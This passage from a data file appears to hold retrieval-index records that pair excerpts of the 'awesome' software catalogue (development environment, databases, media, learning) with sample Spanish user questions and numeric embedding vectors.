-0.02883, -0.07134, 0.01557, -0.0902, -0.06041, 0.05062, 0.00792, -0.07192, 0.0687, -0.03304, 0.06004, 0.04181, -0.05229, 0.02117, -0.01735, 0.03912, -0.02393, 0.02264, -0.00755, -0.00564, 0.04765, -0.03657, -0.05736, 0.03661, -0.0385, -0.01316, -0.03587, -0.00754, 0.0673, -0.01534, -0.02344, -0.07843, -0.08866, 0.07048, 0.05113, -0.03622, -0.03302, -0.05064, 0.00519, -0.00215, -0.06184, -0.01845, 0.03639, -0.05024, 0.0339, 0.02788, 0.04814, 0.0586, 0.01519, 0.0482, -0.02388, 0.02116, -0.07836, 0.02607, -0.01127, -0.04294, -0.05148, 0.01544, -0.04048, 0.02325, -0.02367, 0.04434, -0.0082, -0.00881, 0.0523, 0.0866, 0.08749, -0.02577, -0.0045, -0.00481, 0.02359, 0.02501, -0.04661, -0.00266, -0.01247, -0.0155, 0.02925, -0.0065, -0.00711, 0.04234, 0.0416, 0.02922, -0.00886, -0.05464, 0.02944, -0.05804, 0.00267, -0.03671, 0.00447, -0.05297, 0.04141, -0.02274, -0.01601, 0.03247, 0.01159]} -{"tipo": "pregunta", "herramienta": "Development Environment", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Development Environment", "tema": "development environment", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Development Environment: Quick Look Plugins β€” For macOS. Dev Env. Dotfiles. Shell. Fish β€” User-friendly shell. Command-Line Apps. ZSH Plugins. GitHub β€” Hosting service for Git repositories. Browser Extensions. Cheat Sheet. Pinned Gists β€” Dynamic pinned gists for your GitHub profile. Git Cheat Sheet & Git Flow. Git Tips. Git Add-ons β€” Enhance the CLI [git]. Git Hooks β€” Scripts for automating tasks during workflows [git]. SSH. FOSS for Developers. Hyper β€” Cross-platform terminal app built on web technologies. Terminals Are Sexy. GitHub Actions β€” Create tasks to automate your workflow and share them with others on GitHub. WezTerm β€” Powerful cross-platform terminal emulator.", "indexar": "quΓ© terminal me sirve mΓ‘s si quiero algo rΓ‘pido y fΓ‘cil de usar?", "v": [-0.16376, 0.20307, -0.29352, -0.04214, -0.00613, -0.06619, -0.15738, -0.02931, 0.01064, -0.03862, -0.19545, -0.06309, 0.00245, 0.01835, 0.07696, -0.04318, 0.00612, -0.02588, 0.11574, 0.01014, 0.00442, -0.09697, -0.16265, -0.07008, -0.03005, 0.06932, 0.09779, -0.04874, -0.19565, -0.07273, 0.01912, -0.00111, 0.14419, -0.09002, -0.076, -0.01845, 0.01682, 0.06286, 0.02214, 0.122, 0.0844, -0.04099, -0.11456, 0.08695, 0.11119, 0.05843, 0.0361, -0.01197, -0.0052, 0.02051, 0.01785, -0.05125, -0.07779, 0.04421, -0.06352, 0.01292, 0.08492, -0.11978, 0.07966, -0.04473, -0.10676, 0.01618, 0.05115, 0.08271, -0.01796, -0.05385, -0.05498, 0.04577, -0.07434, 0.04271, -0.03703, 0.0781, 0.07306, 0.04901, 0.05609, 0.08, -0.07109, -0.00553, 0.11837, 0.09123, 0.01205, 0.01708, -0.09004, -0.08682, -0.00416, -0.06099, 0.01638, 0.07207, 0.02878, 0.02679, 0.07353, 0.03598, 0.0084, -0.06342, 0.01436, -0.05946, -0.06871, 0.04229, 0.01655, -0.01021, 0.12325, -0.03312, -0.01559, 0.06918, -0.01627, -0.01506, 0.00087, -0.07993, -0.0306, -0.04541, 0.07093, 0.00943, 0.05038, -0.04709, -0.05871, -0.0234, 0.00501, -0.02081, -0.09832, -0.02771, -0.02662, 0.00706, 0.07827, -0.02063, 0.05631, -0.02176, 0.03907, 0.06332, 0.04868, 0.0204, 6e-05, -0.06976, 0.00198, -0.05349, -0.04816, -0.03986, 0.05591, -0.11422, 0.01258, 0.01463, 0.02315, 0.05627, -0.08998, -0.03503, 0.00527, 0.02493, 0.03333, -0.01335, 0.00287, -0.04696, 0.04033, -0.12173, -0.01586, -0.03755, -0.05312, -0.08718, 0.09633, -0.07296, -0.09574, 0.0527, -0.09427, -0.04937, -0.04813, 0.07048, 0.0273, -0.06292, -0.03444, -0.03077, 0.03611, 0.04576, 0.10652, 0.00289, -0.01796, -0.03892, 0.1078, -0.03529, -0.01536, 0.03209, -0.01864, -0.02155, -0.01926, 0.00188, -0.03219, 0.05172, 0.02399, -0.02568, 0.05078, 0.01403, 0.00634, 0.03089, 0.05728, 0.05555, 0.03146, 0.03408, 0.01251, -0.00455, 0.02598, -0.0605, -0.01287, -0.07857, 0.00653, -0.0504, 0.03352, -0.01188, 0.10746, 0.01912, -0.12854, -0.01034, 0.02844, 0.03326, 0.00416, 0.05899, 0.04843, 0.01243, 0.03595, -0.04166, -0.02308, 0.06662, 0.01025, 0.02486, 0.03453, -0.01676, -0.04948, 0.05881, 0.03293, 0.04965, 0.01307, -0.02792, 0.01759, 0.0422, -0.0211, 0.01027, -0.03678, -0.03798, -0.01449, -0.06105, -0.01455, -0.036, -0.03089, -0.03046, 0.02238, 0.0437, -0.01415, -0.00475, -0.03849, 0.0373, -0.01102, 0.0093, -0.07461, -0.01629, -0.08181, -0.03691, 0.05624, -0.00129, -0.02855, 0.05519]} -{"tipo": "pregunta", "herramienta": "Databases", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Databases", "tema": "databases", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Databases: Database. MySQL. SQLAlchemy. InfluxDB. Neo4j. MongoDB β€” NoSQL database. RethinkDB. TinkerPop β€” Graph computing framework. PostgreSQL β€” Object-relational database. CouchDB β€” Document-oriented NoSQL database. HBase β€” Distributed, scalable, big data store. NoSQL Guides β€” Help on using non-relational, distributed, open-source, and horizontally scalable databases. Database Tools β€” Everything that makes working with databases easier. TypeDB β€” Logical database to organize large and complex networks of data as one body of knowledge. Cassandra β€” Open-source, distributed, wide column store, NoSQL database management system. Supabase β€” An open-source alternative to Firebase. PocketBase β€” An open-source, Go-based backend in one file. Neon β€” An open-source alternative to AWS Aurora.", "indexar": "que herramienta sirve para gestionar grandes redes de datos complejas?", "v": [-0.01117, 0.03706, -0.10787, -0.23594, 0.04894, -0.07661, -0.09741, -0.01624, -0.01412, -0.07349, -0.03869, -0.12809, -0.05015, -0.12174, 0.08972, 0.05126, 0.02273, -0.12766, 0.01063, -0.08215, -0.04314, -0.00913, -0.01737, -0.09675, -0.1608, -0.08569, 0.11772, -0.05969, -0.19517, 0.10582, -0.053, -0.02912, -0.04398, -0.10041, -0.06805, 0.08074, -0.0827, 0.12802, -0.06295, -0.03469, 0.00678, 0.00763, -0.1075, 0.0516, 0.11127, 0.0639, -0.09244, -0.03358, -0.02575, 0.05825, -0.12425, -0.07907, -0.12604, -0.00746, -0.04899, -0.10374, 0.12737, -0.12919, -0.01563, -0.04219, -0.07668, -0.02039, -0.04468, 0.05277, 0.01392, -0.04274, 0.06142, -0.01476, -0.05558, 0.10734, 0.00687, 0.10549, 0.02809, -0.026, 0.05639, 0.00676, 0.11603, 0.10305, -0.00462, 0.02148, 0.00065, -0.01178, -0.14761, -0.00679, -0.02295, -0.0285, 0.08007, -0.02619, 0.00287, -0.04715, 0.00909, 0.02558, -0.04774, -0.06439, 0.07512, 0.09168, 0.03106, -0.11316, 0.02586, -0.04261, 0.02818, 0.04214, -0.06695, 0.04491, -0.06592, 0.10477, 0.00506, -0.04182, -0.04851, -0.07563, -0.00568, 0.02116, 0.01738, -0.00585, 0.00767, 0.0654, -0.02689, -0.01299, 0.00746, 0.02209, 0.03214, -0.0141, 0.03072, -0.03401, 0.02773, 0.00695, -0.04844, 0.12175, 0.07702, -0.01597, -0.0712, -0.01903, -0.04546, 0.0121, 0.01751, -0.0233, -0.06049, -0.16262, -0.02272, -0.16589, -0.07606, 0.06039, -0.12077, -0.11023, 0.07125, 0.00106, 0.084, -0.03096, -0.0216, 0.03884, 0.07322, -0.04764, 0.00491, 0.05624, -0.0552, 0.06287, -0.08237, -0.04815, -0.11848, 0.00516, -0.04974, -0.02843, 0.00889, 0.04329, 0.00434, -0.04391, -0.00294, 0.05831, 0.10209, 0.05506, -0.05507, 0.06514, 0.0424, -0.06496, 0.00939, -0.0398, -0.04128, -0.0676, -0.01578, -0.03717, -0.01617, -0.0553, 0.00994, -0.01441, 0.01237, -0.03929, 0.00589, -0.01378, -0.06784, 0.00705, -0.00411, 0.08839, 0.03515, -0.01788, 0.09883, -0.05488, -0.03672, -0.01926, 0.04832, 0.01346, -0.00855, 0.04028, -0.02334, 0.00724, -0.04622, 0.08374, -0.02838, -0.03312, 0.07018, -0.00537, -0.00479, -0.00848, 0.00288, -0.04507, -0.03274, -0.07257, 0.0415, 0.02152, -0.00865, 0.00248, -0.04242, 0.02368, 0.04908, 0.01542, -0.03234, 0.04936, 0.00762, -0.02618, -0.01291, -0.06541, 0.03471, -0.04177, -0.01738, 0.02984, 0.01373, -0.09016, 0.00922, -0.02417, -0.05821, -0.01349, -0.00564, 0.01909, 0.00343, 0.0161, -0.02715, -0.06056, -0.06599, 0.01006, -0.03292, -0.09159, -0.05431, -0.04288, 0.05722, 0.02099, 0.00899, -0.03267]} -{"tipo": "pregunta", "herramienta": "Databases", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Databases", "tema": "databases", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Databases: Database. MySQL. SQLAlchemy. InfluxDB. Neo4j. MongoDB β€” NoSQL database. RethinkDB. TinkerPop β€” Graph computing framework. PostgreSQL β€” Object-relational database. CouchDB β€” Document-oriented NoSQL database. HBase β€” Distributed, scalable, big data store. NoSQL Guides β€” Help on using non-relational, distributed, open-source, and horizontally scalable databases. Database Tools β€” Everything that makes working with databases easier. TypeDB β€” Logical database to organize large and complex networks of data as one body of knowledge. Cassandra β€” Open-source, distributed, wide column store, NoSQL database management system. Supabase β€” An open-source alternative to Firebase. PocketBase β€” An open-source, Go-based backend in one file. Neon β€” An open-source alternative to AWS Aurora.", "indexar": "cual es una alternativa libre a Firebase para mi proyecto?", "v": [-0.12893, 0.0744, -0.06437, -0.02663, -0.08863, 0.01295, -0.07736, -0.04203, -0.15514, -0.10065, -0.01177, -0.14914, -0.06676, 0.10278, 0.11904, -0.07641, 0.05787, -0.01127, 0.10901, -0.07486, -0.07672, -0.00123, -0.11496, -0.11259, -0.04822, -0.06036, 0.02145, 0.03139, -0.05189, -0.04521, 0.08577, 0.00469, 0.10991, 0.07066, 0.05398, -0.06264, 0.08901, 0.04812, 0.07673, -0.05578, -0.03489, -0.08223, -0.03404, 0.14759, 0.0289, -0.11922, 0.00165, -0.06574, 0.03524, 0.04832, -0.09487, 0.01965, -0.10341, 0.06629, 0.09449, -0.00226, 0.13243, -0.18224, -0.10288, 0.07132, -0.09719, -0.08572, 0.0606, -0.20129, 0.08665, -0.04547, 0.00888, 0.02761, -0.03128, 0.0209, 0.05544, 0.02514, -0.03226, -0.18472, -0.12413, 0.01055, 0.00943, -0.02798, -0.02422, 0.00809, -0.0128, -0.05277, -0.05717, 0.07509, -0.01824, -0.00973, 0.02462, -0.09261, 0.01899, 0.12228, 0.02895, -0.01818, 0.00337, 0.12385, -0.03259, -0.10928, 0.04745, 0.0937, -0.00552, 0.03411, -0.03572, -0.0029, -0.01474, -0.00552, 0.06605, -0.02845, 0.02777, 0.05311, -0.05156, 0.05124, -0.08594, 0.04603, 0.03787, -0.04259, -0.04717, -0.08061, -0.0627, 0.06862, 0.05626, -0.02353, 0.01244, -0.00153, 0.00074, -0.03299, 0.07302, 0.04303, -0.01291, 0.01348, -0.07758, 0.03972, 0.03764, -0.00806, -0.07707, -0.07388, -0.09421, 0.01384, 0.06513, -0.00578, -0.0092, 0.02442, -0.04135, 0.07908, 0.01396, -0.03306, 0.05729, -0.08253, -0.01086, -0.00014, 0.06167, -0.07728, -0.08286, -0.01093, -0.02936, 0.08421, -0.10254, 0.04571, -0.00967, 0.05551, -0.05469, 0.0788, 0.09704, -0.02219, 0.0784, 0.02262, -0.00315, -0.00591, -0.01777, 0.00316, 0.01467, 0.02909, 0.05675, 0.05551, 0.05214, 0.00662, 0.12377, -0.08692, 0.02691, -0.10238, 0.0734, -0.03831, -0.03541, 0.05862, -0.04953, 0.05129, 0.04431, -0.06167, 0.07557, -0.00458, -0.00217, 0.06647, -0.13843, -0.02428, -0.03936, -0.07326, -0.00727, 0.00531, 0.00744, -0.10433, 0.02942, 0.00118, -0.07649, -0.0127, 0.0154, 0.0154, -0.06712, -0.01241, 0.02245, 0.05319, 0.01225, 0.04965, 0.09839, -0.0051, 0.09197, 0.01287, -0.02417, 0.02838, 0.04924, 0.00985, 0.07069, -0.03838, 0.041, -0.00261, 0.01445, 0.01341, -0.00489, -0.00572, 0.04043, 0.00779, -0.05369, -0.00042, 0.0366, -0.02747, -0.01624, 0.02776, 0.02002, -0.0044, -0.03332, 0.04117, -0.02412, -0.0276, 0.04836, 0.07591, -0.03589, 0.00988, -0.00695, -0.01568, -0.08166, 0.01415, -0.0398, -0.04379, -0.08652, 0.02549, 0.05597, -0.02927, 0.05114, -0.00464]} -{"tipo": "pregunta", "herramienta": "Databases", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Databases", "tema": "databases", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Databases: Database. MySQL. SQLAlchemy. InfluxDB. Neo4j. MongoDB β€” NoSQL database. RethinkDB. TinkerPop β€” Graph computing framework. PostgreSQL β€” Object-relational database. CouchDB β€” Document-oriented NoSQL database. HBase β€” Distributed, scalable, big data store. NoSQL Guides β€” Help on using non-relational, distributed, open-source, and horizontally scalable databases. Database Tools β€” Everything that makes working with databases easier. TypeDB β€” Logical database to organize large and complex networks of data as one body of knowledge. Cassandra β€” Open-source, distributed, wide column store, NoSQL database management system. Supabase β€” An open-source alternative to Firebase. PocketBase β€” An open-source, Go-based backend in one file. Neon β€” An open-source alternative to AWS Aurora.", "indexar": "con que programa puedo montar un backend distribuido escalable", "v": [0.14386, 0.05209, -0.22681, -0.12861, -0.15519, -0.00873, -0.02455, -0.0146, -0.18528, -0.16957, 0.02401, -0.02644, -0.00931, -0.12333, 0.03496, 0.01627, -0.07192, -0.10019, 0.06935, -0.01754, 0.06096, -0.0318, -0.05625, -0.10458, 0.07036, 0.0898, -0.06699, -0.00746, -0.07877, 0.00332, 0.09028, 0.01525, 0.05608, -0.03965, 0.03071, -0.044, 0.06266, -0.01444, 0.04845, -0.10549, -0.08393, -0.0015, -0.02307, -0.10564, 0.04396, -0.00013, 0.05597, 0.00781, -0.01258, -0.05615, -0.00241, -0.01556, -0.09542, -0.10022, 0.08345, -0.09057, 0.12611, -0.10644, 0.10313, 0.02187, 0.00368, 0.04502, 0.07814, -0.08658, 0.01636, -0.05286, 0.01245, 0.04362, -0.13188, 0.01723, -0.08724, -0.01824, 0.11556, -0.05264, -0.02488, 0.05336, 0.00416, 0.00484, 0.06323, 0.07712, -0.04729, -0.02787, 0.04815, 0.15881, -0.03955, -0.06478, 0.03045, -0.06302, 0.05116, 0.05273, 0.01741, -0.01893, 0.00019, 0.00855, 0.05406, -0.09943, 0.12104, 0.07443, -0.04983, -0.00295, -0.08454, -0.03615, -0.05246, 0.07536, 0.04838, 0.1271, 0.07866, -0.06126, -0.00617, 0.01082, 0.0134, 0.07649, -0.05721, 0.03423, -0.08445, -0.02931, -0.00357, 0.0401, 0.05692, -0.05148, -0.01283, 0.13681, 0.04871, 0.11663, 0.12371, -0.02062, 0.04136, 0.11072, -0.07142, 0.0688, -0.02343, -0.01164, 0.04354, 0.0122, -0.05591, -0.01776, -0.01275, -0.05984, 0.0481, -0.05229, 0.01307, 0.05258, 0.02165, 0.01115, 0.02048, 0.02831, 0.02468, -0.14324, 0.02713, 0.04441, 0.0009, 0.19374, 0.03197, -0.00064, -0.09974, -0.08172, 0.07568, -0.03554, -0.06916, 0.08659, -0.03318, 0.06128, -0.07192, -0.02659, 0.06089, 0.008, -0.01807, 0.02443, 0.0727, 0.04426, -0.03589, 0.10571, 0.07463, -0.06295, 0.05464, 0.05042, -0.01151, -0.08, 0.00793, 0.03085, -0.02322, -0.02374, 0.06561, 0.00204, 0.00998, -0.05453, -0.02321, 0.04905, -0.01946, 0.0158, -0.00982, 0.02709, 0.04276, -0.02892, 0.0478, -0.01629, 0.013, 0.0653, 0.04997, -0.0314, -0.00519, 0.01064, -0.01415, -0.01324, 0.00621, -0.00531, 0.02152, 0.09347, 0.08819, 0.13924, 0.04298, -0.06113, -0.01254, 0.01979, 0.02663, 0.04528, -0.04006, 0.05749, 0.03064, 0.04901, -0.03534, -0.01652, 0.03409, 0.05537, 0.03587, -0.0997, -0.01653, -0.01704, 0.02196, 0.0158, 0.00411, -0.04331, 0.05231, -0.00636, 0.01518, -0.01326, 0.01842, 0.01419, 0.0051, -0.04596, -0.03152, 0.05994, 0.03286, -0.00606, 0.00102, -0.04198, -0.0349, 0.01769, 0.02067, -0.01959, -0.061, -0.0071, -0.02375, -0.06146, -0.0147, 0.03488]} -{"tipo": "pregunta", "herramienta": "Media", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Media", "tema": "media", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Media: Fonts. Codeface β€” Text editor fonts. Stock Resources. GIF β€” Image format known for animated images. Music. Open Source Documents. Audio Visualization. Broadcasting. Pixel Art β€” Pixel-level digital art. FFmpeg β€” Cross-platform solution to record, convert and stream audio and video. Icons β€” Downloadable SVG/PNG/font icon projects. Audiovisual β€” Lighting, audio and video in professional environments. VLC β€” Cross-platform media player software and streaming server. Audio Over IP β€” Reliably transmit uncompressed, low-latency audio over an IP (layer 3) network.", "indexar": "quΓ© programa me sirve para crear grΓ‘ficos animados tipo GIF?", "v": [-0.03279, 0.06245, -0.07003, -0.09809, 0.10779, -0.15541, -0.04027, -0.01498, -0.00023, -0.10023, 0.12235, -0.07441, -0.12449, -0.01193, 0.12892, 0.01127, 0.01283, -0.13677, 0.0172, 0.09919, 0.04722, 0.12206, 0.03507, -0.23541, -0.05517, -0.10744, 0.07738, -0.04825, -0.07811, 0.03214, 0.08558, -0.00969, 0.03654, -0.14864, -0.1748, -0.0794, 0.09193, -0.0252, -0.03242, -0.00976, 0.07729, -0.0369, -0.11853, 0.01329, 0.04743, -0.06369, 0.02938, 0.0461, 0.02614, 0.01918, 0.04898, 0.04045, -0.01944, 0.01951, -0.05533, -0.11428, 0.04117, -0.20125, -0.13972, 0.01665, -0.01618, 0.06015, 0.02686, -0.02054, -0.0588, 0.04904, 0.09863, 0.01469, -0.03535, -0.02505, 6e-05, 0.03103, 0.02003, -0.06698, 0.05261, 0.06504, -0.13581, -0.04789, -0.01166, -0.06143, -0.02076, 0.00424, -0.0184, -0.01004, -0.08998, -0.084, -0.01136, 0.02112, -0.04523, -0.15145, 0.0018, 0.06237, 0.01322, 0.09023, -0.00855, 0.01633, 0.11657, -0.01084, 0.05191, 0.09701, 0.02778, -0.05908, -0.14961, 0.00075, -0.02258, 0.06377, 0.11751, -0.08688, -0.09809, 0.06051, 0.11183, 0.00604, 0.00537, -0.00231, -0.01172, -0.03762, 0.01495, -0.03314, 0.06443, -0.05181, -0.02947, 0.06055, -0.02997, 0.07427, -0.06108, 0.04701, -0.02402, 0.10284, -0.07488, 0.15952, -0.0131, -0.00637, -0.05724, -0.07875, -0.11069, -0.02901, 0.05823, -0.02093, 0.00728, -0.03618, 0.07282, 0.09601, 0.09091, 0.02253, 0.01669, 0.04343, 0.02612, -0.06627, 0.00312, 0.04732, -0.01551, -0.01297, 0.03244, 0.0183, -0.03042, -0.01849, -0.02798, -0.05875, -0.0334, 0.03453, 0.01678, 0.03804, -0.01451, -0.03643, 0.01775, -0.04819, -0.08643, 0.03396, 0.07409, 0.09232, -0.03082, 0.0651, 0.01823, -0.10181, 0.09356, -0.01093, -0.08675, -0.03937, -0.01328, -0.06296, -0.06625, -0.01376, 0.07036, 0.02874, -0.08219, -0.09842, 0.00729, -0.00422, 0.04863, 0.01322, -0.0486, 0.05716, -0.01613, 0.00317, 0.02737, -0.0574, 0.01311, 0.00073, 0.04297, -0.08817, 0.00038, -0.0161, 0.02199, 0.01995, 0.07344, 0.13212, 0.00025, 0.06451, 0.03464, 0.0537, 0.00454, 0.00098, 0.05118, -0.01785, 0.04374, -0.04867, 0.02187, 0.01641, 0.07638, -0.01406, -0.01266, -0.00226, -0.02495, 0.04221, -0.03059, 0.00413, 0.03858, 0.04759, -0.02009, 0.02354, 0.02341, 0.02886, 0.01499, -0.02023, -0.01099, -0.00914, -0.01709, -0.02886, -0.01245, -0.08177, -0.01431, 0.07309, -0.03956, 0.00566, 0.02986, -0.03126, -0.04363, 0.01294, 0.00108, -0.02552, -0.01727, 0.03594, 0.04351, 0.00345, 0.01666, 0.02755]} -{"tipo": "pregunta", "herramienta": "Media", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Media", "tema": "media", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Media: Fonts. Codeface β€” Text editor fonts. Stock Resources. GIF β€” Image format known for animated images. Music. Open Source Documents. Audio Visualization. Broadcasting. Pixel Art β€” Pixel-level digital art. FFmpeg β€” Cross-platform solution to record, convert and stream audio and video. Icons β€” Downloadable SVG/PNG/font icon projects. Audiovisual β€” Lighting, audio and video in professional environments. VLC β€” Cross-platform media player software and streaming server. Audio Over IP β€” Reliably transmit uncompressed, low-latency audio over an IP (layer 3) network.", "indexar": "hay alguna herramienta para editar y convertir videos sin problemas?", "v": [-0.01285, 0.13553, -0.12261, -0.11773, -0.03924, -0.1346, -0.05442, -0.01766, 0.00358, -0.15599, -0.12775, -0.12965, 0.00685, -0.06596, 0.05668, 0.00578, 0.05831, -0.13324, 0.03104, -0.03615, 0.02463, -0.0306, -0.04426, -0.07112, -0.13059, 0.01264, -0.01042, -0.00702, -0.22805, -0.00329, -0.06563, 0.03804, 0.05226, -0.06104, -0.18315, -0.01011, 0.02952, 0.07944, 0.01224, 0.10186, -0.01454, 0.04477, 0.02834, 0.05298, 0.02445, -0.02992, 0.00612, 0.02743, -0.03797, 0.05379, -0.02327, -0.04551, -0.1234, -0.01703, 0.03571, -0.2307, 0.18016, -0.13588, 0.03673, -0.09593, -0.08366, 0.01716, -0.00358, -0.04894, 0.00747, 0.03083, -0.05883, -0.12066, -0.07135, 0.12744, -0.05289, 0.02299, 0.04615, 0.00996, -0.03942, -0.00848, 0.01716, -0.01164, -0.07039, -0.00481, 0.07494, -0.02518, -0.0447, -0.06041, -0.04735, -0.12866, 0.04151, -0.017, 0.02261, -0.11362, -0.05414, 0.08118, 0.09084, -0.06722, -0.00012, 0.00638, 0.09686, -0.02981, 0.00798, -0.04176, 0.19535, -0.08021, -0.05378, 0.06647, -0.09868, 0.02037, 0.01264, -0.06642, -0.07183, 0.07484, 0.03598, 0.08211, 0.05579, -0.01099, -0.0725, 0.08941, -0.05739, -0.03827, -0.04876, -0.04983, 0.02945, -0.03149, -0.08104, -0.09094, -0.04232, -0.00272, -0.02863, 0.0509, -0.02827, 0.00967, -0.03452, -0.08196, -0.06806, -0.0206, -0.02683, -0.02624, 0.05271, -0.10224, -0.02141, -0.08196, -0.04492, 0.03148, -0.01348, -0.09128, 0.0204, 0.06217, 0.03131, -0.07329, -0.10655, -0.00673, 0.04959, -0.07144, 0.02582, 0.02587, -0.02866, 0.02118, -0.00582, 0.02635, -0.06323, 0.01281, 0.00698, -0.00214, 0.05129, -0.05963, -0.01334, -0.04924, 0.01726, 0.13427, 0.06275, 0.0422, 0.04361, 0.00893, 0.07933, -0.05392, -0.00669, -0.04449, -0.07337, -0.00891, 0.0284, -0.08585, -0.03232, 0.05106, -0.028, 0.00067, 0.00415, -0.04938, 0.0458, -0.01478, -0.05577, -4e-05, 0.01481, 0.00293, -0.0039, -0.14832, 0.07942, 0.02244, -0.06585, -0.08698, -0.00101, 0.03612, -0.03661, -0.0053, -0.01412, 0.00798, 0.01487, 0.0624, -0.03584, -0.0195, 0.04446, -0.03005, 0.00593, 0.01656, -0.02685, -0.03639, 0.0313, -0.02152, 0.00705, 0.08601, -0.05001, 0.00539, 0.03844, -0.01027, 0.04198, -0.0295, 0.00174, 0.0724, 0.03174, 0.04213, -0.0673, 0.01677, 0.00954, -0.06631, -0.03056, -0.02678, 0.02112, -0.02818, 0.02233, -0.01606, -0.02237, -0.02574, 0.02389, 0.04169, 0.03864, 0.0118, -0.05719, -0.00393, -0.01254, 0.01228, -0.02155, -0.10258, 0.00819, 0.0435, 0.07948, -0.01558, -0.01779, -0.00704]} -{"tipo": "pregunta", "herramienta": "Media", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Media", "tema": "media", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Media: Fonts. Codeface β€” Text editor fonts. Stock Resources. GIF β€” Image format known for animated images. Music. Open Source Documents. Audio Visualization. Broadcasting. Pixel Art β€” Pixel-level digital art. FFmpeg β€” Cross-platform solution to record, convert and stream audio and video. Icons β€” Downloadable SVG/PNG/font icon projects. Audiovisual β€” Lighting, audio and video in professional environments. VLC β€” Cross-platform media player software and streaming server. Audio Over IP β€” Reliably transmit uncompressed, low-latency audio over an IP (layer 3) network.", "indexar": "con quΓ© puedo transmitir audio de forma rΓ‘pida entre dispositivos?", "v": [-0.05551, 0.23591, -0.14783, -0.15111, 0.01461, -0.00553, -0.06772, 0.01031, -0.0355, -0.02587, -0.06258, -0.06207, -0.05198, -0.0131, 0.09565, -0.0421, 0.11812, 0.01527, 0.00758, -0.03952, 0.09645, -0.05191, -0.10624, -0.10066, 0.01983, 0.06585, 0.11034, 0.08137, -0.14822, -0.03156, 0.0186, -0.01117, 0.07173, 0.01577, -0.17164, -0.01949, -0.03946, 0.19717, -0.05764, 0.06752, -0.05582, -0.01632, 0.05348, -0.01802, 0.04362, -0.03499, -0.08974, -0.04911, -0.02349, 0.03193, -0.03249, 0.04171, -0.09377, 0.01481, -0.1482, -0.12722, 0.0927, -0.15872, 0.09971, -0.06341, 0.03447, -0.05988, -0.05616, -0.05329, 0.0546, 0.07334, -0.05058, 0.01118, -0.09604, -0.03102, -0.00368, -0.08666, 0.01688, 0.1065, 0.0549, 0.14665, -0.20579, -0.01734, 0.06314, -0.01479, 0.06742, -0.04735, 0.02737, -0.1042, -0.01284, 0.11393, 0.00827, 0.01727, -0.02932, -0.046, -0.01131, -0.00392, 0.10155, -0.10009, -0.01338, -0.08388, -0.02623, 0.00543, -0.05171, -0.0534, -0.02162, 0.08456, -0.13425, 0.08641, -0.05619, 0.00114, 0.0116, -0.12109, 0.07833, -0.04364, -0.07058, 0.00849, 0.02145, -0.04658, -0.0201, -0.04858, 0.03625, -0.07125, -0.01327, 0.1107, -0.06571, 0.03385, 0.05401, 0.01163, 0.06531, 0.01237, -0.01133, -0.02837, -0.01263, 0.07561, 0.1028, -0.05927, 0.03717, -0.07901, 0.0357, -0.05123, -0.01195, -0.00792, 0.02498, -0.04723, 0.08344, 0.03623, -0.04809, -0.04827, 0.00223, -0.0087, 0.03056, -0.02801, -0.02209, -0.02733, -0.02703, 0.04176, -0.07947, -0.08612, -0.02082, 0.02241, 0.06239, -0.06951, -0.04859, 0.08009, -0.00221, 0.02975, 0.01065, 0.00137, -0.03567, -0.0691, -0.00815, 0.03564, 0.04727, -0.03364, -0.09461, 0.00473, 0.05043, -0.04355, -0.06311, 0.04166, -0.04483, 0.02794, 0.11499, -0.07883, -0.02577, 0.07935, -0.03891, -0.00943, 0.02187, -0.01041, -0.04666, -0.02902, -0.03952, 0.02304, 0.00778, 0.04577, 0.05481, 0.03231, 0.07077, -0.04659, -0.0793, -0.0349, -0.09264, 0.05529, -0.08155, -0.05227, 0.03338, -0.02423, 0.05528, 0.00208, -0.02713, 0.04322, 0.02431, 0.08016, 0.03523, -0.02221, 0.05545, 0.01619, -0.03484, 0.07425, -0.00982, 0.02422, -0.00614, 0.02223, 0.08565, 0.03044, 0.04496, -0.02803, 0.0393, 0.03557, 0.00081, -0.00971, 0.0164, -0.06767, 0.03413, 0.02043, 0.02152, -0.00046, 0.02042, 0.02335, -0.03153, -0.02518, -0.05061, 0.02855, -0.01605, 0.04889, -0.00688, 0.04008, -0.03468, 0.00647, -0.04017, 0.0053, -0.03565, -0.10036, -0.0182, 0.05188, 0.06689, -0.01765, 0.01761, -0.01032]} -{"tipo": "pregunta", "herramienta": "Learn", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Learn", "tema": "learn", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Learn: CLI Workshoppers β€” Interactive tutorials. Learn to Program. Speaking. Tech Videos. Computer History. Programming for Kids. STEAM β€” Supplements for specific science, technology, engineering, arts, and math (STEAM) courses across all grade levels. Educational Games β€” Learn while playing. JavaScript Learning. CSS Learning β€” Mainly about CSS – the language and the modules. Product Management β€” Learn how to be a better product manager. Roadmaps β€” Gives you a clear route to improve your knowledge and skills. YouTubers β€” Watch video tutorials from YouTubers that teach you about technology. Hackathon β€” Running fun and productive hackathons. Certificates β€” Free computer science certifications to showcase your knowledge.", "indexar": "que recursos me ayudan a programar desde cero de forma interactiva?", "v": [0.29454, 0.18318, -0.11029, -0.09343, 0.10411, -0.0326, 0.01213, -0.02255, -0.10831, -0.07876, -0.05595, -0.10364, 0.04249, -0.15365, 0.06718, 0.02939, 0.02563, 0.03291, -0.03128, 0.03701, 0.051, 0.04987, -0.03795, -0.07536, 